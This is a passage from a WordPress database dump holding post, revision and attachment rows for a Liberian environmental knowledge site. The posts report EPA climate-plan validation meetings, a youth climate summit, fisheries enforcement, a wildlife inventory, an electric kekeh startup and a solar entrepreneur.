14:08:52','',0,'https://ekmsliberia.info/?p=3735',169,'post','',0),(3736,42,'2021-06-22 14:07:59','2021-06-22 14:07:59','','','','inherit','open','closed','','ndc','','','2021-06-22 14:08:42','2021-06-22 14:08:42','',3735,'https://ekmsliberia.info/wp-content/uploads/2021/06/ndc.png',0,'attachment','image/png',0),(3737,42,'2021-06-22 14:08:50','2021-06-22 14:08:50','<!-- wp:paragraph -->\n<p>Ten counties have so far validated Liberia Nationally Determined Contributions (NDCs).It\'s expected that the rest of the five counties would validate the country\' Climate Action Plan Wednesday, May 26, 2021 at third Regional Validation Meeting in Ganta, Nimba. Like the first and second Regional Validation Meeting which were held in Buchanan, Grand Bassa County and Kakata, Margibi County respectively, the third Regional Validation Meeting is expected to attract local government authorities, representatives of youth groups, women, and people living with disabilities from Nimba, Bong, Lofa, Grand Gedeh and RiverGee counties. See pictorial of the second Regional Validation Meeting, which ended over the weekend in Kakata, Margibi County.</p>\n<!-- /wp:paragraph -->','EPA Holds Second Regional Validation Meeting in Kakata, Margibi County','','inherit','closed','closed','','3735-revision-v1','','','2021-06-22 14:08:50','2021-06-22 14:08:50','',3735,'https://ekmsliberia.info/3735-revision-v1/',0,'revision','',0),(3738,42,'2021-05-31 10:09:00','2021-05-31 10:09:00','<!-- wp:paragraph -->\n<p>The Environment Protection Agency of Liberia (EPA) and partners including Youth Civic Leadership and Environmental Studies (CYCLES) and the United Nations Development Program (UNDP) will on Monday, 31 May 2021 commence a two-day ‘youth environment and climate action summit’ ahead of Wednesday’s National Conference on Environment and Climate Change. The two-day ‘youth environment and climate action summit’ is intended to advance youth decision and input through an integrated approach on key international conventions, agreements and national policies on climate change. The summit which precedes the Government of Liberia’s planned National Conference on Environment and Climate Change is also intended to follow-up on review of progress and challenges on climate and environment policies and action plans. The Liberian Government through the Environment Protection Agency (EPA) in collaboration with the Ministry of Finance and Development Planning, is expected to hold a National Conference on the Environment and Climate Change from 2-5 June, 2021 in Monrovia and Robertsports,  Montserrado and Grand Cape Mount counties, respectively.</p>\n<!-- /wp:paragraph -->','EPA Holds Youth Environment, Climate Action Summit Ahead of National Environment and Climate Change Conference','','publish','open','open','','epa-holds-youth-environment-climate-action-summit-ahead-of-national-environment-and-climate-change-conference','','','2021-06-22 14:15:11','2021-06-22 14:15:11','',0,'https://ekmsliberia.info/?p=3738',168,'post','',0),(3740,42,'2021-06-22 14:12:02','2021-06-22 14:12:02','<!-- wp:paragraph -->\n<p>The Environment Protection Agency of Liberia (EPA) and partners including Youth Civic Leadership and Environmental Studies (CYCLES) and the United Nations Development Program (UNDP) will on Monday, 31 May 2021 commence a two-day ‘youth environment and climate action summit’ ahead of Wednesday’s National Conference on Environment and Climate Change. The two-day ‘youth environment and climate action summit’ is intended to advance youth decision and input through an integrated approach on key international conventions, agreements and national policies on climate change. The summit which precedes the Government of Liberia’s planned National Conference on Environment and Climate Change is also intended to follow-up on review of progress and challenges on climate and environment policies and action plans. The Liberian Government through the Environment Protection Agency (EPA) in collaboration with the Ministry of Finance and Development Planning, is expected to hold a National Conference on the Environment and Climate Change from 2-5 June, 2021 in Monrovia and Robertsports,  Montserrado and Grand Cape Mount counties, respectively.</p>\n<!-- /wp:paragraph -->','EPA Holds Youth Environment, Climate Action Summit Ahead of National Environment and Climate Change Conference','','inherit','closed','closed','','3738-revision-v1','','','2021-06-22 14:12:02','2021-06-22 14:12:02','',3738,'https://ekmsliberia.info/3738-revision-v1/',0,'revision','',0),(3741,42,'2021-06-22 14:14:56','2021-06-22 14:14:56','','','','inherit','open','closed','','youth-summit','','','2021-06-22 14:15:04','2021-06-22 14:15:04','',3738,'https://ekmsliberia.info/wp-content/uploads/2021/05/youth-summit.png',0,'attachment','image/png',0),(3742,42,'2021-06-05 14:16:00','2021-06-05 14:16:00','','World Environment Day, June 2021','','publish','open','open','','world-environment-day-june-2021','','','2021-06-22 14:24:04','2021-06-22 14:24:04','',0,'https://ekmsliberia.info/?p=3742',167,'post','',0),(3743,42,'2021-06-22 14:19:38','2021-06-22 14:19:38','','world environment day','','inherit','open','closed','','world-environment-day','','','2021-06-22 14:19:38','2021-06-22 14:19:38','',3742,'https://ekmsliberia.info/wp-content/uploads/2021/06/world-environment-day.png',0,'attachment','image/png',0),(3744,42,'2021-06-22 14:19:52','2021-06-22 14:19:52','','World Environment Day, June 2021','','inherit','closed','closed','','3742-revision-v1','','','2021-06-22 14:19:52','2021-06-22 14:19:52','',3742,'https://ekmsliberia.info/3742-revision-v1/',0,'revision','',0),(3746,42,'2021-06-12 14:24:00','2021-06-12 14:24:00','<!-- wp:paragraph -->\n<p>Authorities of the EPA have provided several sets of desk top computers, APC Back-up Battery (UPS) and modem with monthly internet data injection to 19 natural resources management institutions for the exclusive use by their environmental knowledge management officers to collect, store and share environmental data, information and knowledge through the Environmental Knowledge Management System (EKMS).</p>\n<!-- /wp:paragraph -->','Authorities of EPA Issues Computers, UPS Batteries and Modems to Institutions Through CCCD Project','','publish','open','open','','authorities-of-epa-issues-computers-ups-batteries-and-modems-to-institutions-through-cccd-project','','','2021-06-22 14:28:37','2021-06-22 14:28:37','',0,'https://ekmsliberia.info/?p=3746',166,'post','',0),(3747,42,'2021-06-22 14:28:05','2021-06-22 14:28:05','','','','inherit','open','closed','','computers','','','2021-06-22 14:28:16','2021-06-22 14:28:16','',3746,'https://ekmsliberia.info/wp-content/uploads/2021/06/computers.png',0,'attachment','image/png',0),(3748,42,'2021-06-22 14:28:34','2021-06-22 14:28:34','<!-- wp:paragraph -->\n<p>Authorities of the EPA have provided several sets of desk top computers, APC Back-up Battery (UPS) and modem with monthly internet data injection to 19 natural resources management institutions for the exclusive use by their environmental knowledge management officers to collect, store and share environmental data, information and knowledge through the Environmental Knowledge Management System (EKMS).</p>\n<!-- /wp:paragraph -->','Authorities of EPA Issues Computers, UPS Batteries and Modems to Institutions Through CCCD Project','','inherit','closed','closed','','3746-revision-v1','','','2021-06-22 14:28:34','2021-06-22 14:28:34','',3746,'https://ekmsliberia.info/3746-revision-v1/',0,'revision','',0),(3749,42,'2021-06-18 10:30:00','2021-06-18 10:30:00','<!-- wp:paragraph -->\n<p>The EPA through it\'s Cross-Cutting Capacity Project (CCCD) holds a two-day teacher training to pilot the environmental awareness curriculum developed recently for secondary schools in Liberia. The two-day learning by doing teachers training was organized in collaboration with UNDP. It\'s taking place at the NASSCOP Building in Kakata, Margibi County.</p>\n<!-- /wp:paragraph -->','The EPA Through the CCCD Project Holds a Two-Day Teacher Training','','publish','open','open','','the-epa-through-the-cccd-project-holds-a-two-day-teacher-training','','','2021-06-22 14:36:11','2021-06-22 14:36:11','',0,'https://ekmsliberia.info/?p=3749',165,'post','',0),(3750,42,'2021-06-22 14:35:52','2021-06-22 14:35:52','','','','inherit','open','closed','','teacher-training','','','2021-06-22 14:35:59','2021-06-22 14:35:59','',3749,'https://ekmsliberia.info/wp-content/uploads/2021/06/teacher-training.png',0,'attachment','image/png',0),(3751,42,'2021-06-22 14:36:08','2021-06-22 14:36:08','<!-- wp:paragraph -->\n<p>The EPA through it\'s Cross-Cutting Capacity Project (CCCD) holds a two-day teacher training to pilot the environmental awareness curriculum developed recently for secondary schools in Liberia. The two-day learning by doing teachers training was organized in collaboration with UNDP. It\'s taking place at the NASSCOP Building in Kakata, Margibi County.</p>\n<!-- /wp:paragraph -->','The EPA Through the CCCD Project Holds a Two-Day Teacher Training','','inherit','closed','closed','','3749-revision-v1','','','2021-06-22 14:36:08','2021-06-22 14:36:08','',3749,'https://ekmsliberia.info/3749-revision-v1/',0,'revision','',0),(3752,42,'2021-06-22 14:45:29','2021-06-22 14:45:29','<!-- wp:paragraph -->\n<p>A team of environmental scientists and technicians headed by EPA Deputy Executive Director, Randall M. Dobayou is out in Nimba County carrying out a full-scale environmental monitoring assessment and chemical inventory at Arcelor Mittal Liberia. The team is monitoring and assessing the tailing ponds, sediment disposition, retention pond at Mount Gangra. The environmental scientists and technicians assessed explosive magazine, the bio-remediation pit, the main sedimentation pond, including the geotechnical Laboratory, landfills, wastewater treatment, and incinerator at Mount Tokadeh. The team\'s mission is to ensure environmental sustainability consistent with the Environmental Protection and Management Laws of Liberia (EPML).</p>\n<!-- /wp:paragraph -->','Environmental Scientists Along With Deputy Executive Director Randall M. Dobayou Carry Out a Full-Scale Environmental Monitoring Assessment at Arcelor Mittal','','publish','open','open','','environmental-scientists-along-with-deputy-executive-director-randall-m-dobayou-carry-out-a-full-scale-environmental-monitoring-assessment-at-arcelor-mittal','','','2021-06-22 14:45:31','2021-06-22 14:45:31','',0,'https://ekmsliberia.info/?p=3752',164,'post','',0),(3753,42,'2021-06-22 14:45:08','2021-06-22 14:45:08','','','','inherit','open','closed','','assessment','','','2021-06-22 14:45:15','2021-06-22 14:45:15','',3752,'https://ekmsliberia.info/wp-content/uploads/2021/06/assessment.png',0,'attachment','image/png',0),(3754,42,'2021-06-22 14:45:29','2021-06-22 14:45:29','<!-- wp:paragraph -->\n<p>A team of environmental scientists and technicians headed by EPA Deputy Executive Director, Randall M. Dobayou is out in Nimba County carrying out a full-scale environmental monitoring assessment and chemical inventory at Arcelor Mittal Liberia. The team is monitoring and assessing the tailing ponds, sediment disposition, retention pond at Mount Gangra. The environmental scientists and technicians assessed explosive magazine, the bio-remediation pit, the main sedimentation pond, including the geotechnical Laboratory, landfills, wastewater treatment, and incinerator at Mount Tokadeh. The team\'s mission is to ensure environmental sustainability consistent with the Environmental Protection and Management Laws of Liberia (EPML).</p>\n<!-- /wp:paragraph -->','Environmental Scientists Along With Deputy Executive Director Randall M. Dobayou Carry Out a Full-Scale Environmental Monitoring Assessment at Arcelor Mittal','','inherit','closed','closed','','3752-revision-v1','','','2021-06-22 14:45:29','2021-06-22 14:45:29','',3752,'https://ekmsliberia.info/3752-revision-v1/',0,'revision','',0),(3764,42,'2021-07-12 22:43:39','2021-07-12 22:43:39','<!-- wp:paragraph -->\n<p>Elvis Teddy Thomas and Willie Y. McGill are two youth on a mission to launch the electric kekeh or e-kekeh revolution in Liberia. They both work for Emergi Liberia, a company focused on renewable transportation that uses the sun’s energy instead of gasoline to power kekehs. The company is linked to Emergi BV based in the Netherlands. If you are interested in buying an e-kekeh or want to know more about the technology, Emergi Liberia’s office is located at the Change Makers Village, 2<sup>nd</sup> Street, Sinkor, Monrovia. Their email address is info@emergi.nl. </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Elvis is the Head of Operations and Willie is the Lead Engineer. Richard van Hoolwerff is the Founder and CEO based in the Netherlands. He had the vision a few years back when he saw all the new kekehs plowing the streets of Monrovia causing harm to the environment due to carbon emissions, and said, “Let’s change them to something electric that will be good for the environment.”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Emergi BV in the Netherlands has been in business since 2016 and Emergi Liberia, which focuses on renewable transportation, started in 2019. They currently have a partnership with a Dutch based company called Tux Mobility that is responsible for manufacturing the e-kekeh. Solar Techno is their other partner responsible for the design and development of the charging stations.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The e-kekehs are powered by an integrated solar rooftop and in-wheel electric drivetrain. This allows for high energy efficiency, providing the e-kekeh with a range of up to 130 kilometers per day. The effective regenerative braking system in the vehicle ensures that a substantial amount of the used solar energy can be recuperated back into the battery during braking actions.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {\"id\":3765,\"sizeSlug\":\"large\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2021/07/image.png\" alt=\"\" class=\"wp-image-3765\"/><figcaption><em>New E-kekeh model with solar panel in the roof</em></figcaption></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>Emergi will introduce a business model that will increase the income of drivers. The drivers can lease the e-kekehs and make use of Emergi’s fleet management services, which include ride-hailing, GPS support and mobile money. The e-kekeh’s maintenance costs is very low and drivers will not need to buy gasoline at all. When one makes an investment in an e-kekeh, most of the money earned will be for their profit, not for gasoline and high maintenance. The e-kekeh has a battery, not an Internal Combustion Engine (ICE), so it makes less noise. On average, the ICE kekeh only lasts 2 years, but the e-kekeh lasts up to 5 years.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>This year, Emergi Liberia is importing 8 e-kekehs as a pilot to test the road and see what challenges will emerge. Based on the outcomes, they will import 250 or more e-kekehs by 2024. In Liberia’s Nationally Determined Contributions (NDC), one of the targets is to import 1,000 e-kekehs before 2025. However, the government of Liberia needs to have the right policies in place to meet this target. Elvis Thomas, Emergi’s Head of Operations said, “We are willing to work with the government to achieve the NDC target of 1000 e-kekehs by 2025. But currently, the government does not have policies on electric vehicles, parts, waste disposal and charging stations.”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {\"id\":3766,\"width\":580,\"height\":268,\"sizeSlug\":\"large\"} -->\n<figure class=\"wp-block-image size-large is-resized\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2021/07/image-1.png\" alt=\"\" class=\"wp-image-3766\" width=\"580\" height=\"268\"/><figcaption><em>Elvis Teddy Thomas, Head of Operations, Emergi Liberia</em></figcaption></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>Emergi is only starting with 8 e-kekehs because they want to build the infrastructure first, which will include the availability of spare parts and charging stations. There is a huge market with the ICE kekeh, and they are bringing huge money into the economy. Hence, the government of Liberia may slowly scale down on the importation of ICE kekehs in order to meet its NDC targets. From 2015-2020, 15,000 ICE kekehs were on the streets of Liberia.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Most kekehs are sold on credit making them easy to acquire. The average cost of an ICE Kekeh is $3,000. The 8 e-kekehs Emergi will be importing this year will not be sold because they want to observe all the challenges. Currently, the cost analysis for manufacturing one e-kekeh in the Netherlands is 4,000 – 5,000 Euros. This is because they are manufacturing e-kekehs on a smaller scale.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Emergi plans to recruit all women drivers for the first 8 e-kekehs. They have completed the first round of recruitment and identified the first 3 women. The remaining 5 women will be recruited in the second phase. They will lease the e-kekehs and pay a daily fee to Emergi. The rest of their income is their profit. During the pilot phase, the company will be responsible for maintenance and charging.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Elvis Teddy Thomas said, “Our major goal is empowerment and equal opportunity. Our company’s core values on women rights and gender inclusion are pushing us to change the current mentality.”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Willie Y. McGill, Emergi’s Lead Engineer said, “We are all looking for solutions to climate change and one of the biggest contributors is the automotive industry. We think the introduction of e-kekehs will provide transport services without pollution. This will also help reduce the emission of dangerous gases into the atmosphere, caused by motor vehicles.”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {\"id\":3767,\"sizeSlug\":\"large\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2021/07/image-2.png\" alt=\"\" class=\"wp-image-3767\"/><figcaption><em>Willie Y. McGill, Lead Engineer, Emergi Liberia</em></figcaption></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>Emergi will also build one solar power station in their office compound on 2<sup>nd</sup> Street, Sinkor for the pilot. When they scale up importation of e-kekehs, more charging stations will be made available in other locations. “The ICE kekehs have the market, but Emergi is bringing something quite different. Our objective is to provide another choice that is environmentally friendly. Ultimately, the decision to buy an e-kekeh versus an ICE kekeh will be up to the end users,” Elvis said.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->','Liberia’s Private Sector is Set to Launch the Electric Kekeh Market - Emergi Liberia','','publish','open','open','','liberias-private-sector-is-set-to-launch-the-electric-kekeh-market-emergi-liberia','','','2021-07-12 22:43:42','2021-07-12 22:43:42','',0,'https://ekmsliberia.info/?p=3764',163,'post','',0),(3765,42,'2021-07-12 22:28:13','2021-07-12 22:28:13','','image','','inherit','open','closed','','image','','','2021-07-12 22:28:13','2021-07-12 22:28:13','',3764,'https://ekmsliberia.info/wp-content/uploads/2021/07/image.png',0,'attachment','image/png',0),(3766,42,'2021-07-12 22:29:43','2021-07-12 22:29:43','','image-1','','inherit','open','closed','','image-1','','','2021-07-12 22:29:43','2021-07-12 22:29:43','',3764,'https://ekmsliberia.info/wp-content/uploads/2021/07/image-1.png',0,'attachment','image/png',0),(3767,42,'2021-07-12 22:33:25','2021-07-12 22:33:25','','image-2','','inherit','open','closed','','image-2','','','2021-07-12 22:33:25','2021-07-12 22:33:25','',3764,'https://ekmsliberia.info/wp-content/uploads/2021/07/image-2.png',0,'attachment','image/png',0),(3769,42,'2021-07-12 22:43:04','2021-07-12 22:43:04','','Emergi.jpg','','inherit','open','closed','','emergi-jpg','','','2021-07-12 22:43:04','2021-07-12 22:43:04','',3764,'https://ekmsliberia.info/wp-content/uploads/2021/07/Emergi.jpg.png',0,'attachment','image/png',0),(3770,42,'2021-07-12 22:43:39','2021-07-12 22:43:39','<!-- wp:paragraph -->\n<p>Elvis Teddy Thomas and Willie Y. McGill are two youth on a mission to launch the electric kekeh or e-kekeh revolution in Liberia. They both work for Emergi Liberia, a company focused on renewable transportation that uses the sun’s energy instead of gasoline to power kekehs. The company is linked to Emergi BV based in the Netherlands. If you are interested in buying an e-kekeh or want to know more about the technology, Emergi Liberia’s office is located at the Change Makers Village, 2<sup>nd</sup> Street, Sinkor, Monrovia. Their email address is info@emergi.nl. </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Elvis is the Head of Operations and Willie is the Lead Engineer. Richard van Hoolwerff is the Founder and CEO based in the Netherlands. He had the vision a few years back when he saw all the new kekehs plowing the streets of Monrovia causing harm to the environment due to carbon emissions, and said, “Let’s change them to something electric that will be good for the environment.”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Emergi BV in the Netherlands has been in business since 2016 and Emergi Liberia, which focuses on renewable transportation, started in 2019. They currently have a partnership with a Dutch based company called Tux Mobility that is responsible for manufacturing the e-kekeh. Solar Techno is their other partner responsible for the design and development of the charging stations.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The e-kekehs are powered by an integrated solar rooftop and in-wheel electric drivetrain. This allows for high energy efficiency, providing the e-kekeh with a range of up to 130 kilometers per day. The effective regenerative braking system in the vehicle ensures that a substantial amount of the used solar energy can be recuperated back into the battery during braking actions.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {\"id\":3765,\"sizeSlug\":\"large\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2021/07/image.png\" alt=\"\" class=\"wp-image-3765\"/><figcaption><em>New E-kekeh model with solar panel in the roof</em></figcaption></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>Emergi will introduce a business model that will increase the income of drivers. The drivers can lease the e-kekehs and make use of Emergi’s fleet management services, which include ride-hailing, GPS support and mobile money. The e-kekeh’s maintenance costs is very low and drivers will not need to buy gasoline at all. When one makes an investment in an e-kekeh, most of the money earned will be for their profit, not for gasoline and high maintenance. The e-kekeh has a battery, not an Internal Combustion Engine (ICE), so it makes less noise. On average, the ICE kekeh only lasts 2 years, but the e-kekeh lasts up to 5 years.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>This year, Emergi Liberia is importing 8 e-kekehs as a pilot to test the road and see what challenges will emerge. Based on the outcomes, they will import 250 or more e-kekehs by 2024. In Liberia’s Nationally Determined Contributions (NDC), one of the targets is to import 1,000 e-kekehs before 2025. However, the government of Liberia needs to have the right policies in place to meet this target. Elvis Thomas, Emergi’s Head of Operations said, “We are willing to work with the government to achieve the NDC target of 1000 e-kekehs by 2025. But currently, the government does not have policies on electric vehicles, parts, waste disposal and charging stations.”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {\"id\":3766,\"width\":580,\"height\":268,\"sizeSlug\":\"large\"} -->\n<figure class=\"wp-block-image size-large is-resized\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2021/07/image-1.png\" alt=\"\" class=\"wp-image-3766\" width=\"580\" height=\"268\"/><figcaption><em>Elvis Teddy Thomas, Head of Operations, Emergi Liberia</em></figcaption></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>Emergi is only starting with 8 e-kekehs because they want to build the infrastructure first, which will include the availability of spare parts and charging stations. There is a huge market with the ICE kekeh, and they are bringing huge money into the economy. Hence, the government of Liberia may slowly scale down on the importation of ICE kekehs in order to meet its NDC targets. From 2015-2020, 15,000 ICE kekehs were on the streets of Liberia.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Most kekehs are sold on credit making them easy to acquire. The average cost of an ICE Kekeh is $3,000. The 8 e-kekehs Emergi will be importing this year will not be sold because they want to observe all the challenges. Currently, the cost analysis for manufacturing one e-kekeh in the Netherlands is 4,000 – 5,000 Euros. This is because they are manufacturing e-kekehs on a smaller scale.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Emergi plans to recruit all women drivers for the first 8 e-kekehs. They have completed the first round of recruitment and identified the first 3 women. The remaining 5 women will be recruited in the second phase. They will lease the e-kekehs and pay a daily fee to Emergi. The rest of their income is their profit. During the pilot phase, the company will be responsible for maintenance and charging.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Elvis Teddy Thomas said, “Our major goal is empowerment and equal opportunity. Our company’s core values on women rights and gender inclusion are pushing us to change the current mentality.”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Willie Y. McGill, Emergi’s Lead Engineer said, “We are all looking for solutions to climate change and one of the biggest contributors is the automotive industry. We think the introduction of e-kekehs will provide transport services without pollution. This will also help reduce the emission of dangerous gases into the atmosphere, caused by motor vehicles.”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {\"id\":3767,\"sizeSlug\":\"large\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2021/07/image-2.png\" alt=\"\" class=\"wp-image-3767\"/><figcaption><em>Willie Y. McGill, Lead Engineer, Emergi Liberia</em></figcaption></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>Emergi will also build one solar power station in their office compound on 2<sup>nd</sup> Street, Sinkor for the pilot. When they scale up importation of e-kekehs, more charging stations will be made available in other locations. “The ICE kekehs have the market, but Emergi is bringing something quite different. Our objective is to provide another choice that is environmentally friendly. Ultimately, the decision to buy an e-kekeh versus an ICE kekeh will be up to the end users,” Elvis said.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->','Liberia’s Private Sector is Set to Launch the Electric Kekeh Market - Emergi Liberia','','inherit','closed','closed','','3764-revision-v1','','','2021-07-12 22:43:39','2021-07-12 22:43:39','',3764,'https://ekmsliberia.info/3764-revision-v1/',0,'revision','',0),(3771,42,'2021-07-13 10:44:19','2021-07-13 10:44:19','<!-- wp:paragraph -->\n<p>Technicians from the EPA headed by Hawa Walker, assistant manager for Conservation are carrying out inventory on animals\' welfare at Libassa Wildlife Sanctuary in Marshall, Margibi County. The technicians are also assessing the animals\' habitat in accordance with Part 6 Section 80 of the Environmental Protection and Management Law of Liberia.</p>\n<!-- /wp:paragraph -->','EPA Technicians Carry Out Inventory on Animal Welfare at Libassa Wildlife Sanctuary in Marshall, Margibi County','','publish','open','open','','epa-technicians-carry-out-inventory-on-animal-welfare-at-libassa-wildlife-sanctuary-in-marshall-margibi-county','','','2021-07-13 10:44:22','2021-07-13 10:44:22','',0,'https://ekmsliberia.info/?p=3771',162,'post','',0),(3772,42,'2021-07-13 10:44:04','2021-07-13 10:44:04','','libassa','','inherit','open','closed','','libassa','','','2021-07-13 10:44:04','2021-07-13 10:44:04','',3771,'https://ekmsliberia.info/wp-content/uploads/2021/07/libassa.png',0,'attachment','image/png',0),(3773,42,'2021-07-13 10:44:19','2021-07-13 10:44:19','<!-- wp:paragraph -->\n<p>Technicians from the EPA headed by Hawa Walker, assistant manager for Conservation are carrying out inventory on animals\' welfare at Libassa Wildlife Sanctuary in Marshall, Margibi County. The technicians are also assessing the animals\' habitat in accordance with Part 6 Section 80 of the Environmental Protection and Management Law of Liberia.</p>\n<!-- /wp:paragraph -->','EPA Technicians Carry Out Inventory on Animal Welfare at Libassa Wildlife Sanctuary in Marshall, Margibi County','','inherit','closed','closed','','3771-revision-v1','','','2021-07-13 10:44:19','2021-07-13 10:44:19','',3771,'https://ekmsliberia.info/3771-revision-v1/',0,'revision','',0),(3774,42,'2021-03-21 09:10:07','2021-03-21 09:10:07','<!-- wp:paragraph -->\n<p>National Fisheries and Aquaculture Authority(NaFAA) in collaboration with the Liberia National Coast Guard rescued a crew of fishermen from the Popo Beach Fishing Community who went missing on Friday, March 20, 2020 while fishing.</p>\n<!-- /wp:paragraph -->','NaFAA Along With National Coast Guard Rescue Fishermen Lost at Sea','','publish','open','open','','nafaa-along-with-national-coast-guard-rescue-fishermen-lost-at-sea','','','2021-07-13 19:14:32','2021-07-13 19:14:32','',0,'https://ekmsliberia.info/?p=3774',161,'post','',0),(3775,42,'2021-07-13 19:13:44','2021-07-13 19:13:44','','nafaa','','inherit','open','closed','','nafaa-3','','','2021-07-13 19:13:44','2021-07-13 19:13:44','',3774,'https://ekmsliberia.info/wp-content/uploads/2021/07/nafaa.png',0,'attachment','image/png',0),(3776,42,'2021-07-13 19:14:29','2021-07-13 19:14:29','<!-- wp:paragraph -->\n<p>National Fisheries and Aquaculture Authority(NaFAA) in collaboration with the Liberia National Coast Guard rescued a crew of fishermen from the Popo Beach Fishing Community who went missing on Friday, March 20, 2020 while fishing.</p>\n<!-- /wp:paragraph -->','NaFAA Along With National Coast Guard Rescue Fishermen Lost at Sea','','inherit','closed','closed','','3774-revision-v1','','','2021-07-13 19:14:29','2021-07-13 19:14:29','',3774,'https://ekmsliberia.info/3774-revision-v1/',0,'revision','',0),(3777,42,'2021-04-07 12:15:00','2021-04-07 12:15:00','<!-- wp:paragraph -->\n<p>To deter illegal, unreported and unregulated (IUU) fishing across Liberia, the National Fisheries and Aquaculture Authority (NaFAA) has fined an Ivorian Fishing Boat US$5,000.00 consistent with the 2010 Fisheries Regulations.</p>\n<!-- /wp:paragraph -->','NaFAA Fines Illegal Ivorian Fisherman US$5,000.00','','publish','open','open','','nafaa-fines-illegal-ivorian-fisherman-us5000-00','','','2021-07-13 19:19:43','2021-07-13 19:19:43','',0,'https://ekmsliberia.info/?p=3777',160,'post','',0),(3778,42,'2021-07-13 19:18:31','2021-07-13 19:18:31','','Untitled','','inherit','open','closed','','untitled-2','','','2021-07-13 19:18:31','2021-07-13 19:18:31','',3777,'https://ekmsliberia.info/wp-content/uploads/2021/07/Untitled.png',0,'attachment','image/png',0),(3779,42,'2021-07-13 19:19:41','2021-07-13 19:19:41','<!-- wp:paragraph -->\n<p>To deter illegal, unreported and unregulated (IUU) fishing across Liberia, the National Fisheries and Aquaculture Authority (NaFAA) has fined an Ivorian Fishing Boat US$5,000.00 consistent with the 2010 Fisheries Regulations.</p>\n<!-- /wp:paragraph -->','NaFAA Fines Illegal Ivorian Fisherman US$5,000.00','','inherit','closed','closed','','3777-revision-v1','','','2021-07-13 19:19:41','2021-07-13 19:19:41','',3777,'https://ekmsliberia.info/3777-revision-v1/',0,'revision','',0),(3781,42,'2021-07-20 21:28:39','2021-07-20 21:28:39','<!-- wp:paragraph -->\n<p>Across the world, innovators from different sectors have invented devices, vehicles and medication that have solved our problems, made our lives easier and even saved lives. To name a few, Alexander Graham Bell invented the telephone in Scotland and Thomas Edison invented the light bulb in the United States. Now, Anthony Tay, 39 years old, is following their footsteps as he finds innovative solutions to electricity challenges using solar power. </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Anthony Tay is a Liberian Information Technology (IT) professional who got involved in solar energy research and development through a slight twist of fate. In 2012, he was running an internet café on Duport Road in Paynesville near Monrovia. One day, a Kenyan businessman came looking for high speed internet to pay his employees online back in Kenya. The man was in Liberia attending a religious event and looking for innovative people to join a training program in Kenya. After chatting with Anthony, the man realized that he was using technology that was far more advanced than the other internet cafes he had visited. Anthony was using laptops when the other cafes were still using desktops. Anthony was also using boosters that enabled him to provide high speed internet. The man was able to pay his employees online in less than 15 minutes. After listening to Anthony’s brilliant ideas, the man invited him to Kenya to join the training program. While studying in Kenya, renewable energy stood out to Anthony as a solution to Liberia’s electricity challenges. From there, Anthony planned to register a company and deal in renewable energy products when he returned to Liberia. </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><img width=\"293\" height=\"293\" src=\"https://lh6.googleusercontent.com/Wfo-1igoHGwvgwOoO5boGmeIb9j_xhadKwBsOiUfviP65XvRidX-JRQjXe39L6NVcEV57u0cpS0bc49ParcCsSLvp21WXzTludo6oCntbVfmN4Fjwpx0yxP1mAF1_ZiWXtvgTQM\">  </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Upon his return, Anthony continued his studies in the area of solar, which led to his certification by the North American Board of Renewable Energy Practitioners. He later started a company called Africa Capital Turning Systems. Then he got a contract at the German Embassy where he did some computer networking. He used the money he earned to procure the first set of solar products for testing at his own facility.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Anthony’s first test was a mini-home system at the house he was living in. Before he moved in, the house had burned down due to problems with a tiger generator. The owner of the house was traumatized and refused to connect any electricity in the house after the incident. The place was in darkness. At the time, solar technology was already his focus, so Anthony installed the system and his family had electricity all the time from solar energy without noise and without needing gas, while other people had generators. He 